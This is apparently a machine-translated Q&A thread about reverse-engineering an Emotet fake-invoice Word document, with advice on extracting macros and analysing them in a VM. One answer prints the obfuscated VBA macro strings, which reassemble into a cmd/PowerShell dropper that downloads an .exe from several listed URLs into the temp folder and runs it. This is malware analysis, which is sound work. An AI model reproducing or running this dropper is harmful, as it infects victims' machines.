该 pastebin托管当前的 URL,托管Emotet 恶意软件的虚假发票,这是恶意软件的投放器部分。
该文档是 Office Open XML,其中有两个大的非文本段。
我无法理解其他部分。
其中之一是这样的:
我假设另一个至少包含一些 VB 脚本和其他东西,但它解码(假设 base64 像 jpg 部分)到文件识别的任何内容。
Emotet发票,word文档里面的内嵌文件是什么
逆向工程
二元分析
恶意软件
2021-06-25 11:30:04
2个回答
在不查看文件本身的情况下,除了用作宏的 VB 脚本之外,第二部分更有可能是某种混淆/加密的可执行文件。
然而,由于使用了明显的宏,可执行文件(PE 或脚本)可能至少有些混淆,并且只会在将其放入磁盘或类似的东西之前进行解码/解密。
静态地,您最安全的选择是提取宏(这并不难,就标准而言,宏非常明显)并反转所使用的解码/反混淆方法。
一种更简单的方法是通过打开文档并让宏在 VM 内运行来让文档删除可执行文件,可选择使用诸如进程资源管理器/api 监视器之类的东西来捕获删除的文件。
vba 似乎是这样的东西 函数似乎没用 zillnp 似乎采用这个字符串
您可以复制粘贴字符串并连接它
Sub foo()
zwrqd = "c:\on" + "jzi" + "oi\" + "izwolr" + "\poic" + "wo\" + "..\" + "..\"
szrtncm = "..\win" + "dow" + "s\sys" + "tem32\" + "cmd." + "exe /c" + " %Pro" + "gram"
uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"
hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "'\'" + Chr(43) + "pmet" + ":vne"
wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"
rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "
uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr
MsgBox (uhdurz + jitovh + wwiqv)
End Sub
其它你可能感兴趣的问题